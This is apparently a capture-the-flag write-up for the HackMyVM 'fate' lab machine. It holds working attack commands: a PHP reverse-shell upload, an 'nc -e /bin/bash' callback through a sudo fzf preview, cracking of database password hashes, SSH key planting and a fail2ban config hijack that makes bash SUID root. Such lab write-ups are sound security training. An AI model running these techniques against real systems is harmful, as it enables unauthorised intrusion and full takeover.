### Write up for https://hackmyvm.eu/machines/machine.php?vm=fate ###

ip=[targetIP]
threader3000

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 61:39:bc:89:db:98:a7:63:15:fe:13:54:01:22:8d:52 (RSA)
|   256 bb:a3:b7:24:76:9c:fd:27:8f:13:ef:f5:cf:4f:8b:ab (ECDSA)
|_  256 0c:af:8b:a0:fa:3f:7b:38:52:b4:93:a0:65:da:c0:7c (ED25519)
80/tcp    open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
13120/tcp open  http    Node.js Express framework
|_http-title: Gancio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


feroxbuster -n -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $url -x php,txt,html,zip,bak,htm,cgi -t 500 -e

301      GET        7l       11w      169c http://$ip/uploads => http://$ip/uploads/
200      GET       12l       27w      285c http://$ip/index.html
200      GET        1l        8w        0c http://$ip/upload.php
200      GET       12l       27w      285c http://$ip/

Visit $url
we see that we can upload file
lets try php-reverse-shell

nc -lvnp [port]

The file revsh.php has been uploaded and renamed to db405464322afaa2bd0fd784b91011b6

$url/uploads/ ----> 403

curl $url/uploads/db405464322afaa2bd0fd784b91011b6
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

after a lot of struggling 

trying both the normal name and the renamed one

i tried to upload a new file but run a backround script before uploading
(rename your php-revshell)

while [[ "$(curl -s -o /dev/null -w ''%{http_code}'' http://$ip/uploads/rev.php)" != "200" ]]; do sleep 5; done

nc -lvnp [port]

we got shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

stty -a; stty raw -echo;fg
export SHELL=bash
export TERM=xterm
stty rows (values from stty -a) cols (values from stty -a)


find / -perm -u=s 2>/dev/null
getcap -r / 2>/dev/null

nothing special

its linpeas time

python3 -m http.server 80

cd /tmp
wget <ourip>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

gancio       624  0.1 16.7 946532 167428 ?       Ssl  17:10   0:09 node /usr/local/bin/gancio
/etc/systemd/system/gancio.service is executing some relative path
/etc/systemd/system/multi-user.target.wants/gancio.service is executing some relative path
uid=107(gancio) gid=113(gancio) groups=113(gancio)
drwxr-xr-x  4 gancio gancio 4096 Feb 16 10:51 gancio
-rw-r--r-- 1 gancio gancio 1282 Apr  3 17:10 /tmp/node-jiti/server-initialize.server.js.c8d34e02.js


find / -iname gancio 2>/dev/null

/var/lib/mysql/gancio
/usr/local/bin/gancio
/usr/local/share/.config/yarn/global/node_modules/gancio
/usr/local/share/.config/yarn/global/node_modules/.bin/gancio
/usr/local/share/.cache/yarn/v6/npm-gancio-1.4.0-a5c1a777ef5121604ff781af17417f88e64f3191/node_modules/gancio
/usr/local/share/.cache/yarn/v6/npm-gancio-1.4.0-a5c1a777ef5121604ff781af17417f88e64f3191/node_modules/gancio/.bin/gancio
/usr/local/share/.cache/yarn/v6/.tmp/01e94e889254727c8b933650006ea644/.bin/gancio
/opt/gancio

cd /opt/gancio
ls -alh
total 20K
drwxr-xr-x 4 gancio gancio 4.0K Feb 16 10:51 .
drwxr-xr-x 3 root   root   4.0K Feb 16 10:40 ..
-rw-r--r-- 1 gancio gancio  474 Feb 16 10:51 config.json
drwxr-xr-x 2 gancio gancio 4.0K Apr  3 17:10 logs
drwxr-xr-x 3 gancio gancio 4.0K Feb 16 10:51 uploads


cat config.json

"log_level": "debug",
  "log_path": "/opt/gancio/logs",
  "db": {
    "dialect": "mariadb",
    "storage": "",
    "host": "localhost",
    "database": "gancio",
    "username": "******",
    "password": "******",
    "logging": false,
    "dialectOptions": {
      "autoJsonMap": false

mysql -u[username] -p[password]
show databases;
use gancio
show tables;
select * from users;

get two hashes

exit

pico hashes
add the two hashes

john --wordlist=/usr/share/wordlists/rockyou.txt hash

you will get only connor's pass

ssh connor@$ip

sudo -l
Matching Defaults entries for connor on fate:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User connor may run the following commands on fate:
    (john) NOPASSWD: /usr/bin/fzf

lets check gtfobins
nothing

sudo -u john /usr/bin/fzf --help

sudo -u john /usr/bin/fzf --preview 'nc <yourip> 1234 -e /bin/bash'

nc -lvnp 1234                 

listening on [any] 1234 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.6] 58448
id
uid=1001(john) gid=1001(john) groups=1001(john)

cd 
mkdir .ssh
chmod 755 .ssh
cd .ssh
echo "your id_ssh.pub" >> authorized_keys
chmod 655 authorized_keys
exit

ssh john@$ip

ls
cat user.txt

sudo -l 
User john may run the following commands on fate:
    (root) NOPASSWD: /usr/bin/systemctl restart fail2ban

After some google search i found 2 ways

/etc/fail2ban/action.d/iptables-multiport.conf
and 
/etc/fail2ban/action.d/iptables-common.conf

The first one didnt work for me.

cd /tmp
echo "chmod +s /bin/bash" > iptables
chmod +x iptables

ls -alh /bin/bash
-rwxr-xr-x 1 root root 1.2M Aug  4  2021 /bin/bash

pico /etc/fail2ban/action.d/iptables-common.conf

# Option:  iptables
# Notes.:  Actual command to be executed, including common to all calls options
# Values:  STRING
iptables = iptables <lockingopt>
change to 
iptables = /tmp/iptables <lockingopt>

save and close

watch -n 0 ls -alh /bin/bash

open a new terminal and ssh john2@$ip
try few times and you will see 

-rwsr-sr-x 1 root root 1.2M Aug  4  2021 /bin/bash

john@fate:/tmp$ /bin/bash -p
bash-5.1# 
ls /root

cat /root/root.txt